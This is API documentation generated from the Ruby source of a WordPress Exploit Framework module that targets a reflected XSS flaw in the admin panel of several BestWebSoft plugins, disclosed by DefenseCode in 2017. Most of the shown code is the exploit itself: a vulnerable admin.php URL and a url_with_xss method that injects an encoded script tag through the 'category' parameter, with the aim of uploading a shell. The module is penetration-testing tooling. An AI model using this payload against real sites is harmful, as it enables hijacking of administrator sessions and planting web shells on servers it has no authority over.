class Wpxf::Exploit::BwsPanelReflectedXssShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::ReflectedXss::new
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'Multiple BestWebSoft Plugins Reflected XSS Shell Upload',
    author: [
      'DefenseCode', # Discovery
      'rastating'    # WPXF module
    ],
    references: [
      ['WPVDB', '8796'],
      ['URL', 'http://www.defensecode.com/advisories/DC-2017-02-014_50_WordPress_plugins_by_BestWebSoft_Advisory.pdf']
    ],
    date: 'Apr 12 2017'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 23
def check
  return :unknown if plugin_name.nil?
  return :vulnerable if fixed_version.nil?

  check_plugin_version_from_readme(plugin_name, fixed_version)
end
fixed_version() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 34
def fixed_version
  nil
end
plugin_name() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 30
def plugin_name
  nil
end
url_with_xss() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 42
def url_with_xss
  "#{vulnerable_url}?page=bws_panel&category=%22%3E%3Cscript%3E#{xss_url_and_ascii_encoded_include_script}%3C%2Fscript%3E%3C%22"
end
vulnerable_url() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 38
def vulnerable_url
  normalize_uri(wordpress_url_admin, 'admin.php')
end